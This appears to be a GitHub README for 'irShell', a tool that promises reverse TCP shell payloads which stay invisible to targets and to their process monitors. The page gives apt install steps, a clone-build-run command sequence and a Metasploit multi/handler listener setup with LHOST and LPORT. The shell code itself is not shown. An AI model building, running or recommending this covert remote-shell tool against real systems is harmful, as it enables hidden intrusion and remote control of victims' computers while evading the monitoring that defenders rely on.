| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Name | Name | Last commit date | ||
|---|---|---|---|---|
 |  | |||
 |  | |||
 |  | |||
 |  | |||
 |  | |||
 |  | |||
💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷
What I believe to be an original and effective method for creating reverse TCP payloads that are 100% invisible not only to the target but the target's resource/process monitors, no PIDs or even open ports are visible. Simple MSFconsole handlers/listeners are then used for callbacks.
SHC
sudo apt install -y shc
Bash
sudo apt install -y bash
GCC
sudo apt install -y gcc
git clone https://github.com/MBHudson/irShell.git && cd irShell && sudo gcc irShell.c -o irShell && sudo chmod +x irShell
sudo ./irShell
set exploit/multi/handler set PAYLOAD linux/x64/shell_reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 run
| Back | FazBrowse Home | New Git URL |